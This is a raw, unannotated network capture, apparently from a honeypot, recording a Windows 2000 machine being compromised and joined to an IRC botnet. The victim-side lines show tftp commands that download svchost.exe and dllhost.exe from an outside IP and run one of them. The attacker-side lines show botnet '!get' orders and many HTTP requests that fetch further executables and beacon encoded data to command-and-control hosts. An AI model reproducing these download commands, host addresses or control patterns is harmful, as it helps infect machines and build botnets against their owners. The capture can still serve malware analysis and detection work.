Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 98.175.55.219 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 98.175.55.219 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29456 bytes in 5 seconds, 5891 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 98.175.55.219 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 5 seconds, 3993 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK btzgjpxeUSER u020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG btzgjpxe :!get http:/ii.derquda.com/rc.exe:u. PRIVMSG btzgjpxe :!get http:/lb.perfectexe.com:88/kp.jpg:u. PRIVMSG btzgjpxe :!get http:/www.derquda.com/mh13.txt 
VICTIM:  	GET /mh13.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.4959986 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /ftse2.exe?t=0.2236139 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 68.169.42.201Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=E4FA0DE98515B76701E9722B662027E5BF245335B0E2C157C1A21B5131E8F3DB511D38D5AF9334009AA17DE6C4FF8A6717EEC57FEC9F50744B7FDA7CDD773647B3FE95E017158916F9C3463CBB55B56A6A9D5568A0DE080EAA082A47A44EB8C1A6F74B5A40602887CB78C4435F5F67FD7582CCE37136F9DEABF2A5CABB0DDB650902C467F1C4C105FDC7326206C0A222&t=0.3729517 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /getofferbox.php?distid=1 HTTP/1.0Host: 216.119.149.6 
ATTACKER:	GET /sn.php?c=F6E8C6225ECEAF7FDC34A7FE4305AE6C1C876E0894C6049283E049031DC45E76D29E7D905A66596D0932A03BDDE651BCE51C08B2F0837357A79383257CD61A6B175A483D292B58C7C9F32E54C729D20D9F681C21EC92D2D48F2DC1ACDF3597EEA6F78594B595EF404DFEBF29BA430880CC392876134084B60C188FFAA103CB31A1B1CF662712A5620731FFACB07608772CCD&t=0.9484522 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /o/0/r/63/Fun4IMV6.exe HTTP/1.0Host: download.bandoo.com 
ATTACKER:	GET /cdn/o/0/r/63/Fun4IMV6.exe HTTP/1.0Host: download.cdn.bandoo.com 
ATTACKER:	GET /stk17.exe?t=0.2257501 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 68.169.45.53Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=8B95D531AA3AC515978FE7D7176CD71496098BBC84A7BE2497AFA5D31ACD8DA2B0CD07E1330ECBF99DAB87EA1A1624CCAB5054EC11655F79D4B48AF099E490FB2C7D03A4ED3B8F107B41700AD03EA8772CDBA99488F6949266C4422F2BC1A8D178295F4E19394DE27AC9C94ECACAB02A31C6416ECA8DBA9D346D147B01B743FD4D4AEF48380C83402218F5A6D91EC9B7&t=0.2795221 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=7B65B85C6FFF72A2A4BC4F7FBDC696554ED15265F0D3851F291102745C8B113E552850B6370A695BD3E58BE6ACA0DF373AC13C842A5EEEC8ABCB4E34027F7B10065773D431E75BC45E64C2B87A9416C9AB5CA598B9C7EAECBF1DF29F7399136A7C2D5849B1914AE543F0FD6B0FF68C04AF5A653B10431C2E849096E3B416CB31E2F27ADE4D7C77B3BF8584DD8E46D2A99349&t=0.6488306 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /i103.jpg?t=0.5447046 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 109.196.134.25Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5947CC2823B3C014F6EA5C767E32C90BC969553278676BF07340E8A24F957C26C1BBBD50D7BC0C50D0BB8916C2C89C7375BBE35E1E808B94DBBF532F1FB4D1A26E10AD0B1FC7EF70F8C29DE7E30D26F90AFD82BF205EE8EE9E3C80ED3DD78CF5FAABD0C15B7B45EAD86B5BDC939355CFC33488A77E397E59C49D523DFB4DBA043E349D3A2C192BEE1724CA98C204552E&t=0.7375147 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=312F2ECACE5E944004185D7784C8E92BDB7B95F2EDF2C15A5F6C246E2BF181DBF28837DACBA0530FA0CBFB64555F719E529C03BE22BCA0BF4521EA966EC5FA89BBC5399FAE76F16EF1CB8BF124CA914E50A7EFD2B0CE0503E7458DE0E9035D2419488D9C6C4C8E21932034A2748DBB338174500EACFFB3820216D7A241E3BA40D9C9CB6F3A158C4E655660390CC59FE3D30F&t=0.6839868 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /admin/1.exe?t=0.6584894 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: chiangmaifilm.tvConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5947D4301D8D08DD253EA7FD400609CA26EBD3E86E3FA8600C6A1A68F15C5A7586C93DD714788DBF5866C15BD8D18E66AE65F315E884AB8BB0832A5DCF63940B562D4C3669BB07987E4494EE9779AD723CCB92AF37493F3971D3731E54BEEC959FCE829399B9FF50FB48EF680C0CBD27C433CFE0F8BF8CABD48D650A2B9D5BE5747CA00462533DFE7544E4B302C557D7&t=0.1775782 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justnewleft.ruConnection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /c98dc79dsdcsc.php?ini=v22MzDS1G9TyWD5l61YdHLJrOeDmJ4Q6O41eHyF2exxSCwCA2UWMzTylUVrHIQqMgMqV7ZlNfgiBMF4cFHrzfIqRtufQpKX+Nvtstu7pkw== HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: justtambo.inUser-Agent: Mozilla/6.0 (Windows; wget 3.0)Content-Length: 197Connection: closeCache-Control: no-cachedata=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0NkRSTjbezD67GE5vqnba854vSIwDT7FRe+FY4kubI+3dE2Ybs2QMCcGA/DGf27Us3YIDsWkCi49R7B1MJetj5acN84zaTnmrVIPOVH9gda23cpItg= 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu